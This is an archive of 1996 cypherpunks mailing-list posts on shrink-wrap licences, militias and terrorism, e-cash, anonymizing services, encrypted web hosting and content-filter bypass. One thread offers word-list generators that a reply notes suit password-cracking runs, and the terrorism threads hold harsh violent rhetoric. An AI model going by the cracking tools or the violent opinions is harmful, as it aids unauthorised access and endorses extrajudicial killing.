uncopyrightable subject matter, which is supposed to be pre-empted by 17
USC 301.  But I'm not a copyright attorney (I'm not even an attorney at
all), so I will defer to those more knowledgeable than I.

					--bal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hallam-Baker <hallam@ai.mit.edu>
Date: Sat, 6 Jul 1996 11:21:20 +0800
To: Deranged Mutant <cypherpunks@toad.com
Subject: Re: Shrink-Wrap Lic. uphelo by courts.  From Edupage, 4 July 1996
In-Reply-To: <4rk4j2$qdr@life.ai.mit.edu>
Message-ID: <31DDAECD.41C6@ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Deranged Mutant wrote:
> 
>The latest
> ruling found this suggestion to be an onerous burden, but did say the box
> must have a notice saying there's a licensing agreement inside, and that
> buyers should be able to return the software if they don't agree to the
> license once they read it.  (Investor's Business Daily 3 Jul 96 A5)


Perhaps Prof Froomkin could provide an opinion. It sounds to me however
as if the defendants were simply ripping off the copyright of the plaintif
and attempting to get arround it by claiming to have "bought" rights to
resell along with the software by wrangling over the shrink wrap agreement.

Or were the defendants reselling the software unopened to foreign customers
via the Internet? Seems to me that that might well be open to further 
challenge. If a "contract" clause is expressed in a manner that means that
it would not be encountered by a party which it attempts to bind there might
be argument as to whether acceptance was possible. 

I suspect that the claims the plaintifs were making lay very definitely
within the range of what people in the trade would usually expect to be
the licensing terms for software purchased off the shelf. Just as there 
is an expectation when purchasing a book that one has purchased an instance
and not the rights to the copyright. Consider the analogy with purchasing a
book that is wrapped in shrink wrap film and that consequently one was
unable to read the "all rights reserved" legend.

The question that I am interested in is whether someone could claim that
a shrink wrap license can bind a user to terms that are less widely expected
in the industry. For example clauses which prohibit reverse engineering,
transfer to other users etc.

Might be interesting to know the precise rulling made and its terms.


		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vinnie moscaritolo <vinnie@webstuff.apple.com>
Date: Sat, 6 Jul 1996 12:44:36 +0800
To: cypherpunks@toad.com
Subject: Re: Net and Terrorism
Message-ID: <v03007603ae03660965f2@[38.26.2.89]>
MIME-Version: 1.0
Content-Type: text/plain


>Absent the fearmongering, the Viperweenies would
>have turned to something else antisocial, buut they wouldn't have had a
>"movement" to cling to. (Or maybe they would have... in another era, they
>would have joined up with the Weathermen or the Symbionese Liberation Army.)

last time I chacked there were at least two Leftist Militia's in the
SantaCruz area. (now ain't that a scary thought... Liberals with guns).

These people, both Right and Left don't get it. Blowing shit up and running
around in the woods with cheap ChiCom rifles palying army does nothing for
your cause.  It just distances you from the mainstream morons. This makes
it easier for the Feds to get away with kicking in your door, gassing your
kids and shooting your wives. all in time for the 6PM news.

I guess I dont understand this fascination with Militias and woods, Maybe
these guys forgot how much fun it was to toast marshmellows in the woods,
assuming you have the proper permit from the CA state parks.

>Fortunately, and despite what, say, the SWC says in its fundraising
>materials, the middle of the road among the militias isn't that kooky.

The SWC arent kooks, they are con men

>Bo Gritz and the leaders of the Michigan Militia were heard calling the
>Freemen
>a bunch of lying scum; I've observed more mainstream (if that's the word)
>militiafolk distancing themselves from the Viperweenies both online and on
>shortwave.

Col Gritz actually does have some interesting stuff to say, He is really a
very caring guy. But I do think he could use a (better) PR person. I like
about 99% of what he has to say,  I just filter out the stuff about UN and
weather control. (the UN can't even control it's bowels much less the
weather). But hey Bo is old enough to take care of himself.


>Anyway, I don't think Vinnie was suggesting that the news be censored --
>just that the press doesn't have an obligation to print the obituary the
>"martyrs" want.

Absolutely. Something like "some asshole terrorist just blew up a building.
No cause was sited, is enough" Don't quote thier organization, don;t quote
thier cause. just make look like the kook they are. Oh and offering
citizens some bounty money for thier hydes is a good idea. Or better yet,
when you catch the fuckers, give em a fair trial, and a public hanging.
Same goes for terrorists that shoot pregnant women if you know what I mean,
but thats my opinion.


As for a solution to governement problems, I have always and still belive
in the ballot box first. And the only way to win votes is to appeal to the
morons out there who do vote.. Maybe there is hope in the next generation
of internet literate kids.. or maybe I am just a dreamer.




Vinnie Moscaritolo
------------------
"friends come and friends go..but enemies accumulate."
http://www.vmeng.com/vinnie/
Fingerprint: 4FA3298150E404F2782501876EA2146A






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 6 Jul 1996 12:03:52 +0800
To: cypherpunks@toad.com
Subject: C2's Anonymizer in Reuters
Message-ID: <01I6Q712ED5S984P39@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	Not the most friendly of articles... but still pretty good. As usual,
edited to stay within fair use.
	-Allen

>   Reuters New Media
   
>   _ Friday July 5 12:28 PM EDT _
   
>Web Surfing Incognito

>   HOLLYWOOD - Ever felt like browsing without leaving those footprints
>   that site designers, your school and your employer are increasingly
>   inclined to harvest?
   
>   A service being offered at http://www.anonymizer.com purports to give
>   Web surfers the freedom to travel at will without leaving tell-tale
>   signs that they've been where they've been.
   
[...]

>   The visited site's layout and design can be altered, so you are
>   probably not seeing it in all its glory -- and it is displayed within
>   a field with hot buttons to take you back to the anonymizer site, a
>   FAQ or to make a bug report (like, for example, you've reached a site
>   which isn't preceded by the anonymizer URL).
   
>   Privacy is one of those issues veteran Netizens take very seriously --
>   it used to be called "anonymous" FTP after all. But many
>   sites now depend on demographics passively collected, rather than just
>   the number of hits, to attract advertisers.
   
>   Copyright, Reuters Ltd. All rights reserved




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Erle Greer <erleg@sdinter.net>
Date: Sat, 6 Jul 1996 12:44:05 +0800
To: cypherpunks@toad.com
Subject: Re: Word lists for passphrases
Message-ID: <2.2.32.19960706015358.00712dec@pop3.sdinter.net>
MIME-Version: 1.0
Content-Type: text/plain


Word-List Builder  (this is not an ad)

I have a small(5k) program(WordList.EXE) that will extract <words> from any
file and append the new words to a textfile(MainList.TXT).  It is in early
beta, but does the job nicely.  I simply drag-n-drop multiple files onto the
icon and let it do its dirty work.  It prints new words to the screen and
echos "." when it encounters old words again.  It will, of course, accept
parameters from DOS.

This is totally free to anyone who wants it.  Just email and I will send the
latest version.  Suggestions are certainly considered.

Imagine building a word-list just from your /Netscape/Cache subdirectory!

Future versions will include:
     Larger multiple file handling, *.* in same directory support, better
binary file support, and list sorting.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 6 Jul 1996 11:53:37 +0800
To: cypherpunks@toad.com
Subject: E-cash & G10 in the news
Message-ID: <01I6Q75MZDP0984P39@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	It's interesting but actually unsurprising that they're looking at the
cash cards before they are the Internet money exchange stuff. They haven't
spotted exactly how much of a difference the latter can make - the former will
act about like cash at "worst" from their viewpoint.
	-Allen

>   Reuters New Media
   
>   _ Friday July 5 12:27 PM EDT _
   
>G10 mulls effect of E-cash on policy and fraud
   
>   ZURICH - The threat of fraud, money laundering and tax evasion from
>   new electronic payment systems will be high on the agenda of Monday's
>   monthly meeting of Group of 10 (G10) central bankers at the Bank for
>   International Settlements (BIS).
   
>   The central bank governors will be briefed on two reports that examine
>   the implication of emerging forms of payment -- electronic purses,
>   e-cash, cybercash -- on monetary policy and whether it will open the
>   way to widespread fraud.
   
>   With big banks already waging a fierce battle to set a new global
>   standard for electronic cash, central bankers want to stay on top of a
>   technology that is not only likely to destabilize monetary aggregates,
>   but also holds out the promise a cashless society and threatens the
>   monopoly of central banks to issue notes and coins.
   
>   William McDonough, president of the New York Federal Reserve and
>   chairman of the G10 Committee on Payment and Settlement Systems, will
>   brief his colleagues on electronic money and fraud, money laundering,
>   counterfeiting, tax and legal issues.
   
>   The other report, to be presented by Charles Freedman, Bank of Canada
>   deputy governor, explores the issue of electronic money and monetary
>   policy.
   
>   Whether G10 governors take action or merely note the reports and let
>   them fade into the BIS archives is uncertain. An initial decision will
>   probably be taken at the meeting.
   
>   The two reports will focus mainly on the implications of prepaid cards
>   rather than so-called network money, cybercash or digital cash as the
>   latter is less developed.
   
[...]

>   The concept of electronic money covers a wide range of new payment
>   methods ranging from multi-purpose, rechargeable prepaid cards, such
>   as Mondex, to forms of digital cash or cybermoney that enable shoppers
>   to pay for goods over the Internet.
   
[...]
   
>   Copyright, Reuters Ltd. All rights reserved




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Sat, 6 Jul 1996 07:25:00 +0800
To: Mark Rogaski <wendigo@gti.net>
Subject: Re: CWD -- Jacking in from the "Keys to the Kingdom" Port
In-Reply-To: <199607051544.LAA20442@apollo.gti.net>
Message-ID: <31DD6A5E.28D95ABC@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Mark Rogaski wrote:
>  
> B)  Forget the CONFIG.SYS ... what about kids using Macs or some future
>     "Kid Safe" system that has the filters in an eeprom?  I'm talking
>     about bypassing the censorship on the client-server level.  Relatively
>     platform independent.

Or, more likely, the filter being at the ISP end.  If set up
well it would only be possible to bypass with outside help.

Gary
--
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 6 Jul 1996 08:18:07 +0800
To: cypherpunks@toad.com
Subject: Re: I confess [Was: Who was that Masked Cypherpunk?]
Message-ID: <ae02cb41000210047cce@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:25 PM 7/5/96, Duncan Frissell wrote:

>Since no one has mentioned exactly what happened at the LP Convention, I
>will relate it from memory and JR can correct me.
>
>They were going to vote on adopting a platform plank that upheld the right
>of everybody to use any crypto they wanted and export it an everything and
>also opposing the proposal for a requirement that people use a key escrow
>system set up by the government.

I'm now watching the LP convention on C-SPAN, and taping it for a friend
(who may have a book contract to do a book related to something along these
lines).

The one LP event I ever attended was the California LP annual convention,
some years ago, and found it crushingly boring. This looks a bit more
exciting.

I suspect the LP will continue to get 3-4% of the vote, maybe a tad more
this year due to widespread dissatisfaction with Dinton and Clole and with
the obvious charisma of Harry Browne.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sat, 6 Jul 1996 16:50:45 +0800
To: Erle Greer <erleg@sdinter.net>
Subject: Re: Word lists for passphrases
In-Reply-To: <2.2.32.19960706015358.00712dec@pop3.sdinter.net>
Message-ID: <Pine.LNX.3.93.960706000705.1518B-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 5 Jul 1996, Erle Greer wrote:

> Word-List Builder  (this is not an ad)
> I have a small(5k) program(WordList.EXE) that will extract <words> from any
> file and append the new words to a textfile(MainList.TXT).  It is in early
> beta, but does the job nicely.  I simply drag-n-drop multiple files onto the
> icon and let it do its dirty work.  It prints new words to the screen and
> echos "." when it encounters old words again.  It will, of course, accept
> parameters from DOS.

     Is the source code available for porting to other platforms?

> This is totally free to anyone who wants it.  Just email and I will send the
> latest version.  Suggestions are certainly considered.

     Unixi, recursively scanning directories. 

> Imagine building a word-list just from your /Netscape/Cache subdirectory!

     Imagine building a word list from /usr/spool/news/*


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sat, 6 Jul 1996 16:45:48 +0800
To: CyberEyes <cyberia@cam.org>
Subject: [NOISE] Re: Net and Terrorism.
In-Reply-To: <Pine.GSO.3.94.960705120406.23070B-100000@Stratus.CAM.ORG>
Message-ID: <Pine.LNX.3.93.960706001016.1518C-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 5 Jul 1996, CyberEyes wrote:

> On Wed, 3 Jul 1996, snow wrote:
> >      2) When they _are_ exposed, let them fight the fuck back. Rules of 
> >         engagment are simple. When fired on, shoot to kill. If the shot 
> >         comes from a building, take out the building. If from a crowd, 
> >         well, do you best, but _get the shooter_. 
> 	Basically, what you're saying is that one armed person in a crowd
> of a hundred needs to be killed no matter what happens to the lives of the
> other 99? Give me a break, we're not living in the 1800's anymore, we want
> to STOP wars, not create them!

     Tell that to the person on the recieving of the terrorist bullets/
gernades. 

     The idea is have a very simple policy about terrorism/guerilla warfare/
lone kooks shooting shit up. They will be eliminated. No other changes 
will be made. No midnight house to house searchs, no pograms, no
concentration camps, justa  simple rule. You shoot at armed people you will
die (remember this was in the context of terrorist attacks against military
and harder targets). 

     It is done _immediately_ if not sooner. 

     Possibly it would have the side effect that people in a crowd would 
take down the guy next to them that was pulling the gun becasue they 
know what will happen if they don't. 

i
Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sat, 6 Jul 1996 16:48:08 +0800
To: CyberEyes <cyberia@cam.org>
Subject: Re: Net and Terrorism.
In-Reply-To: <Pine.GSO.3.94.960705122330.23070C-100000@Stratus.CAM.ORG>
Message-ID: <Pine.LNX.3.93.960706001706.1518D-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 5 Jul 1996, CyberEyes wrote:
> On Thu, 4 Jul 1996, attila wrote: 
> > "denied zones" (we were never there) is no longer in vogue.  however, we
> > will probably see that again in parts of the world as many cultures do
> > not have the basic respect for life we do.  
> 
> 	What is your last comment supposed to mean exactly? Just because
> some Islamic militants decide to kill a few people in a terrorist attack
> does not mean that the entire believer population of Islam does not have
> respect for life. Just who is "we"? Americans? Europeans? All

     At this point I believe that attila was refering to the situation in 
South East Asia. Mostly Hindu/Bhuddist/Shinto(?). 

> industrialized nations? Every country except those Third World ones? Uh...
> I don't see your point very clearly here... The only culture I can think
> of that might now have respect for life are cannibals, and they DO have
> respect for life in a way, they don't kill each other (I don't think), and
> they do it because it's their lifestyle, but they don't perform
> cannibalistic acts out of malice. Correct me here if I'm wrong.

     Most tribes place a high value on their members and little if any 
on the members of other tribes. 

     Life is as live does, and it is often cheap. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Sat, 6 Jul 1996 10:27:42 +0800
To: cypherpunks@toad.com, e$@thumper.vmeng.com
Subject: Announce: Ecash(tm) Software Developer's Kit Beta 2 release
Message-ID: <199607052316.BAA27884@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

The Ecash(tm) Software Developer's Kit is available now for
download from "http://www.digicash.com/api".  The major
improvement it that it now _accepts_ payments as well as makes
them.  Accounts at the "Beta Research Bucks" Bank 
(dc.digicash.com:9666) are available upon request.


Here's the README:


- ----- begin included README -----

Announce!

This is the second beta release of the Ecash(tm) Software
Developer's Kit.  It includes:


* the beta 2 release of ecashlib
* a simple test client with source code for reference
* a simple TCP/IP library for use with the test client


Changes since the last release:

* Importantly: The EC_pocket_begin_accept_payment() function
    works.
* Unimportantly: Some internals got upgraded.
    EC_main_get_ver_string() implemented.  Some parameters moved
    from EC_pocket_new() to EC_pocket_begin_open_account(),
    which is their natural habitat.  A small bug or two was 
    squelched.


How to download:

Option 1:  Menu
  Visit the directory structure at 
  "http://www.digicash.com/api/distrib" and take whatever you 
  like.

Option 2:  MRE
  For Windows (Win32 DLL):
  "http://www.digicash.com/api/ecashlib.zip"

  For FreeBSD (static lib):
  "http://www.digicash.com/api/ecashlib-freebsd.tar.gz"

  For Linux (shared ELF lib):
  "http://www.digicash.com/api/ecashlib-linux.tar.gz"

  For others:  e-mail us


What do I do next?

Visit: "http://www.digicash.com/api" for the latest release.  

Subscribe to: "ecash-dev@digicash.com" for news and views.

Send e-mail to: "bryce@digicash.com" for developer support.

Withdraw from: the BRB Bank dc.digicash.com:9666.  You'll have 
to send us e-mail explaining why we should allocate any of our
precious Beta Research Bucks to you, and what you want your
account name(s) to be.

Create: innovative net applications using Ecash(tm) -- the
only secure, privacy-protecting, token-based digital payment
system!


- ----- end included README -----


Bryce

Ahoy!  PGP sig ahead!



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMd2iNkjbHy8sKZitAQEGbgMAkDRKou6yt5ESqtAvJUsgDpf5xGBw0S8A
zTPnC4mwVIFbyo0P8rGaiR434OkmqwkZYtkcg3Bt+6QU5b3lVx7qD0JFNp31PGyn
Yn8F7dLmTr8yJhU1aCHHkZjPvwt1IcM5
=iTG3
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Erle Greer <erleg@sdinter.net>
Date: Sat, 6 Jul 1996 16:48:55 +0800
To: cypherpunks@toad.com
Subject: Re: Word lists for passphrases
Message-ID: <2.2.32.19960706061818.006bbe8c@pop3.sdinter.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:09 AM 7/6/96 -0500, snow@smoke.suba.com wrote:
>On Fri, 5 Jul 1996, Erle Greer wrote:
>
>> Word-List Builder  (this is not an ad)
>> I have a small(5k) program(WordList.EXE) that will extract <words> from any
>> file and append the new words to a textfile(MainList.TXT).  It is in early
>> beta, but does the job nicely.  I simply drag-n-drop multiple files onto the
>> icon and let it do its dirty work.  It prints new words to the screen and
>> echos "." when it encounters old words again.  It will, of course, accept
>> parameters from DOS.
>
>     Is the source code available for porting to other platforms?

Sure, I'm not a Unix guru, but if you can port Turbo Pascal, more power to you!
I will send the source if someone specifically asks.

>> This is totally free to anyone who wants it.  Just email and I will send the
>> latest version.  Suggestions are certainly considered.
>
>     Unixi, recursively scanning directories.

Unix, you can do, but the recursive subdirs aren't a prob for me.  A final dream
would be to convert it to VB4, use MS's WWW custom control, and unleash it as a
spider.

>> Imagine building a word-list just from your /Netscape/Cache subdirectory!
>
>     Imagine building a word list from /usr/spool/news/*
>
>Petro, Christopher C.
>petro@suba.com <prefered for any non-list stuff>
>snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sat, 6 Jul 1996 21:45:03 +0800
To: cypherpunks@toad.com
Subject: CCC Crypto Lock
Message-ID: <199607061110.EAA02640@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


MicroPatent, 4 July 96
 
 
Systems and methods for protecting software from 
unlicensed copying and use (Assignee -- Convex Computer 
Corporation) 
 
 
Abstract: Disclosed systems and methods for protecting a 
software program from unauthorized use and copying 
through the removal at least one of a plurality of 
instructions comprising a software program, and 
encrypting the removed instruction utilizing an 
encryption algorithm to produce an encrypted instruction, 
the encryption algorithm responsive to a randomly 
generated key. 
 
Ex Claim Text: A processing system for protecting a 
software program from unauthorized use, said software 
program including one or more unencrypted instructions 
stored in memory associated with said software program, 
said processing system comprising: a processing unit 
operable to: remove at least one selected said 
unencrypted instruction from an executable area in said 
memory associated with executable portions of said 
program; encrypt said at least one selected unencrypted 
instruction removed from said software program utilizing 
an encryption algorithm to produce an encrypted 
instruction; store said encrypted instruction within a 
first non-executable data area in said memory associated 
with said software program; and insert at least one 
trappable instruction in place of said encrypted 
instruction within said executable area in memory 
allowing said software program to be linked with one or 
more other programs. 
 
Assignee: Convex Computer Corporation 
 
Patent Number: 5530752 
 
Issue Date: 1996 06 25 
 
Inventor(s): Rubin, Robert J. 
 
If you would like to purchase a copy of this patent, 
please call MicroPatent at 800-984-9800.  
 
Copyright 1996, MicroPatent 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 6 Jul 1996 19:40:33 +0800
To: Gary Howland <gary@systemics.com>
Subject: Re: What remains to be done.
In-Reply-To: <31DBB50A.5656AEC7@systemics.com>
Message-ID: <Pine.SUN.3.94.960706051017.19983B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 4 Jul 1996, Gary Howland wrote:

> Black Unicorn wrote:
> > 
> > A.  Methods to run secure websites on insecure servers.

[...]

> I fully agree with all of your comments, but, encrypted proxying issues
> aside, what is wrong with SSL?  Is it because the encryption is for
> the whole server, not individual users?

It provides no protection to the individual who must run on a server he
does not have in a secure location with TEMPEST specs.

> > Is anyone considering work on these?

> With regard to the local decryption idea, then I don't see this as
> much of a problem.  How much interest is there in this?  We already
> have something similar running, but it would still need a bit of work
> to make more general.

What do you have running exactly?

> 
> Gary
> --
> pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
> Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 6 Jul 1996 19:50:26 +0800
To: attila <attila@primenet.com>
Subject: Re: What remains to be done.
In-Reply-To: <199607040558.WAA07414@primenet.com>
Message-ID: <Pine.SUN.3.94.960706051146.19983C-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 4 Jul 1996, attila wrote:

> Addressed to: Black Unicorn <unicorn@schloss.li>
>               Cypherpunks <cypherpunks@toad.com>
> 
> ** Reply to note from Black Unicorn <unicorn@schloss.li> 07/03/96 10:17pm -0400
> 
> 	good "white paper."
> 
> 	modularity is the key.  use of standardized encryption libraries 
>     permitting user selection of one or more formats.

Agreed.

> 	message pools would be great from satellite channels --how do you 
>     regulate (read this as "pay for") since someone must receive the messages to 
>     uplink?  -otherwise you have the dropouts of USENET.

I think that one of the faults of the mentality of development is that
people think "who will pay" first, rather than making a hack first, and
then trying to apply it to a more commercial context.

Seems to have worked with PGP/Netscape/Yahoo/<insert startup high tech IPO
here>.

> 	user interface is the achilles heel for most programmers --the time is 
>     spent making the code 'work.'  with the tools available which allow multi-
>     platform development, the *functional* GUI should be done by someone who
>     creates "artitstic" interfaces.

Concur.

> 	I agree-- if encryption can be made so simple, and with a clean user 
>     interface, it will be used by joe sixpack (who rarely likes uncle, anyway 
>     --but for different reasons). once joe sixpack starts to use (probably 
>     dropping his private keys...), then it is too pervasive to stop --even if 
>     there are a few high level prosecutions.

Exactly.

> 	one of our greatest failings v/v encryption as a group (including 
>     coderpunks) is we are satisfied with our access to encrytion. PGP is a 
>     nusiance, and the instructions are not clear --so we experiment until we get 
>     the results: on the command line.  

Concur most strongly.

> 	our satisfaction makes us insular; we need to think in global terms --mass 
>     marketing of a free product which will hold appeal for everyone.  encryption 
>     is no different than the students in China --no, they do have it, but how long 
>     can Father Deng (and his successors) hang on against technology and quest for 
>     knowledge?

All most important questions to consider.

I think if people begin to write modularly there will be nice front ends
for almost everything.

> --
> Fuck off, Uncle Sam. Cyberspace is where democracy lives!
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 6 Jul 1996 19:45:49 +0800
To: Hal <hfinney@shell.portal.com>
Subject: Re:  What remains to be done.
In-Reply-To: <199607042102.OAA26752@jobe.shell.portal.com>
Message-ID: <Pine.SUN.3.94.960706051414.19983D-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


>From: Black Unicorn <unicorn@schloss.li>
>> A.  Methods to run secure websites on insecure servers.
>> [...]
>> A software solution which permits local decryption makes traffic 
>> analysis less useful, presents the opportunity to use front end and
>> disposable www pages on domestic ISPs while imposing no liability on
>> the ISP itself, and opens several more effective traffic analysis
>> deterants.

>I don't quite understand what is being proposed here.  If the
>information on the web site is encrypted, who is supposed to be able to
>decrypt it?  Just one person, or some select group of people?  My
>concern is the difficulty of keeping keys secret if they are made
>available to more than one or two people.

>Once the keys are known to those who would oppose the publication of
>the information they can go to the ISP just as easily as if the
>information were not encrypted, and get them to take it down if it is
>illegal.

>It would seem that an equally effective method would be to use no
>encryption, but just a secret URL, one which is not linked to from
>elsewhere - an "island in the net", so to speak (apologies to Bruce
>Sterling).

>Hal

I was concerned with an entirely different problem really.
Given the assumption that you and three of your best friends wish to use
WWW to share information, how can you do so without exposing the page
to the ISP?

Today, as far as I know, if you wish to hide what you have on a page you
have to control the server.  If you wish to try and deter traffic analysis
you have to own the servers in front of the server.  Cumbersome,
expensive and still not entirely effective.

If instead you could prevent the owner of the server from reading the
stuff in the first place, while allowing it to be read at leasure by the
users...

It would also be much easier to construct remailer type proxies in that
each server in the chain would be denied the content of data passing
through.

What I am hoping can be done is to stretch the points in "point to point
encryption" out past the ISP.

Now, if your concern is exposure by a member you have given access to the
webpage, the discussion becomes an issue of certification, and signatures.
An important point, but something of an overkill where the ISP has full
access to your webpage whatever your passwords might be.

Create a page where the data is locally encrypted, and which only accepts
connections from valid certificates and you go a long way to being able to
communicate via WWW securely even over insecure channels.  You also free
up the method to those who don't have time, or cannot afford to run their
own WWW server.

If the location of your page is exposed, so what?  Spend the $11 a month
to open a page on another ISP.  In the "island on the net" example, you
have to reroute the entire deal.

In addition, you have now eliminated what must be the number 1 problem in
running an "iffy" page.  ISP intereference.  You have removed their
liability.  How were they supposed to know what it was you were doing?
They don't have the keys.

Now if you really wanted to be slick about it, you would use a form of
encryption to multiple users option and encrypt the page to the public
keys of individuals.  Sure, they could release the keys and spill the
beans, but they would be compromising their own keys in the process.
Mileage on this deterant will vary according to what they may have done
with the key beforehand, and it requires a multiple purpose to those keys
(as with PGP).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jonathon <grafolog@netcom.com>
Date: Sat, 6 Jul 1996 17:08:23 +0800
To: CyberEyes <cyberia@cam.org>
Subject: Re: CWD -- Jacking in from the "Keys to the Kingdom" Port
In-Reply-To: <Pine.GSO.3.94.960705123427.23070E-100000@Stratus.CAM.ORG>
Message-ID: <Pine.SUN.3.94.960706062348.29843A-100000@netcom11>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 5 Jul 1996, CyberEyes wrote:

>  NOT talking about Lynx, what DOS-based Web browser is there?

	Net-Tamer.  

	Requires a PPP connection, and precious little else.  

        xan

        jonathon
        grafolog@netcom.com


	AOL coasters are unique, and colourful.  
		Collect the entire set. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AwakenToMe@aol.com
Date: Sun, 7 Jul 1996 00:10:06 +0800
To: cypherpunks@toad.com
Subject: Re: Word lists for passphrases
Message-ID: <960706092922_350344400@emout18.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


I have a util that will create a word list starting from aaaaaaaaaaa on up to
anythingggggggg
basically you could do every combination. Let me know if ya want it.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 7 Jul 1996 01:07:59 +0800
To: AwakenToMe@aol.com
Subject: Re: Word lists for passphrases
In-Reply-To: <960706092922_350344400@emout18.mail.aol.com>
Message-ID: <199607061436.KAA05825@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



AwakenToMe@aol.com writes:
> I have a util that will create a word list starting from aaaaaaaaaaa on up to
> anythingggggggg
> basically you could do every combination. Let me know if ya want it.

That would really be of great use for doing wordlist crack runs. It
must have taken you a long time to write -- generous of you to offer
it.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sun, 7 Jul 1996 04:51:23 +0800
To: jonathon <grafolog@netcom.com>
Subject: Re: CWD -- Jacking in from the "Keys to the Kingdom" Port
Message-ID: <2.2.32.19960706175510.00f3a638@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:27 AM 7/6/96 +0000, you wrote:
>On Fri, 5 Jul 1996, CyberEyes wrote:
>
>>  NOT talking about Lynx, what DOS-based Web browser is there?
>
>	Net-Tamer.  
>
>	Requires a PPP connection, and precious little else. 

The problem is getting PPP to work under DOS.  If your kid can do that, then
he will have no problem in disabling any sort of filtering, as well as
wiping the hard drive and installing Linux with X11R6.  DOS stacks are a
pain to get functioning, usually have little to no useful instructions, and
tend to be harder than hell to find.  (Or as Homer Simpson once said:
"Mmmmmm! Packet drivers!")

I expect to see a case where some kid gets in trouble for filtering out what
his parents can see, read, or hear.  Or sets the school filter to only allow
going to porno sites.

I find it humorous how many people think that they can use technology to
babysit their kids when the kids understand the technology much better than
they do in most cases...
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sun, 7 Jul 1996 05:21:53 +0800
To: "Mark M." <wendigo@gti.net>
Subject: [RANT] Re: CWD -- Jacking in from the "Keys to the Kingdom" Port
Message-ID: <2.2.32.19960706181747.00987320@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:27 PM 7/5/96 -0400, Mark M. wrote:

>> B)  Forget the CONFIG.SYS ... what about kids using Macs or some future
>>     "Kid Safe" system that has the filters in an eeprom?  I'm talking
